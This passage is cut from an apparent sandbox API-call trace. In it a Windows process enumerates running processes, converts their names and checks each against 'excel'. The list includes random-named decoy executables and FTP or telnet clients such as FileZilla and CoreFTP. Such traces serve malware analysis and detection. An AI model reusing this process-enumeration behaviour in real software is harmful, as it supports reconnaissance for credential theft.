lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0096.401] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0096.401] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="excel") returned 0x0 [0096.401] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0096.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0096.402] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3575420 [0096.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x3575420, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0096.402] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0096.402] StrStrIA (lpFirst="nights-attending.exe", lpSrch="excel") returned 0x0 [0096.402] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0096.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.403] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35774e0 [0096.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x35774e0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0096.403] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0096.403] StrStrIA (lpFirst="installed.exe", lpSrch="excel") returned 0x0 [0096.403] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0096.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0096.404] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356b168 [0096.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x356b168, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0096.404] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0096.404] StrStrIA (lpFirst="references compounds.exe", lpSrch="excel") returned 0x0 [0096.405] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0096.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0096.406] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3575180 [0096.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x3575180, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0096.406] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0096.406] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="excel") returned 0x0 [0096.406] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0096.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0096.407] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35752c0 [0096.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x35752c0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0096.407] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0096.407] StrStrIA (lpFirst="registered try.exe", lpSrch="excel") returned 0x0 [0096.407] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0096.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0096.409] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356b1b8 [0096.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x356b1b8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0096.409] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0096.409] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="excel") returned 0x0 [0096.409] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0096.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.410] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3577528 [0096.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x3577528, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0096.410] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0096.410] StrStrIA (lpFirst="invite.exe", lpSrch="excel") returned 0x0 [0096.410] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0096.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0096.411] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35772d0 [0096.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x35772d0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0096.412] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0096.412] StrStrIA (lpFirst="idol.exe", lpSrch="excel") returned 0x0 [0096.412] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0096.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0096.413] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356b000 [0096.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x356b000, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0096.413] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0096.413] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="excel") returned 0x0 [0096.413] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0096.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0096.414] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356ae48 [0096.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x356ae48, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0096.414] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0096.414] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="excel") returned 0x0 [0096.414] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0096.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0096.415] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35774c8 [0096.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x35774c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0096.415] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0096.415] StrStrIA (lpFirst="powell_jane.exe", lpSrch="excel") returned 0x0 [0096.415] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0096.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0096.416] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35752e0 [0096.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x35752e0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0096.416] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0096.416] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="excel") returned 0x0 [0096.416] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0096.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0096.417] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35774f8 [0096.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x35774f8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0096.418] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0096.418] StrStrIA (lpFirst="gainedshape.exe", lpSrch="excel") returned 0x0 [0096.418] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0096.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0096.419] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3575080 [0096.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x3575080, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0096.419] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0096.419] StrStrIA (lpFirst="opens-versions.exe", lpSrch="excel") returned 0x0 [0096.419] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0096.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0096.426] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356b1e0 [0096.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x356b1e0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0096.426] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0096.426] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="excel") returned 0x0 [0096.426] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0096.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.427] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3577318 [0096.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x3577318, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0096.427] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0096.427] StrStrIA (lpFirst="3dftp.exe", lpSrch="excel") returned 0x0 [0096.427] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0096.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0096.429] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3575300 [0096.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x3575300, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0096.429] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0096.429] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="excel") returned 0x0 [0096.429] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0096.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.430] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3577330 [0096.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x3577330, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0096.430] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0096.430] StrStrIA (lpFirst="alftp.exe", lpSrch="excel") returned 0x0 [0096.430] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0096.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.431] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3577540 [0096.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x3577540, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0096.431] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0096.431] StrStrIA (lpFirst="barca.exe", lpSrch="excel") returned 0x0 [0096.431] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0096.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.432] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3577558 [0096.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x3577558, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0096.432] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0096.432] StrStrIA (lpFirst="bitkinex.exe", lpSrch="excel") returned 0x0 [0096.432] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0096.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.434] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35772a0 [0096.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x35772a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0096.434] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0096.434] StrStrIA (lpFirst="coreftp.exe", lpSrch="excel") returned 0x0 [0096.434] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0096.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0096.435] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574d90 [0096.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x3574d90, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0096.435] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0096.435] StrStrIA (lpFirst="far.exe", lpSrch="excel") returned 0x0 [0096.435] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0096.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.436] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35772e8 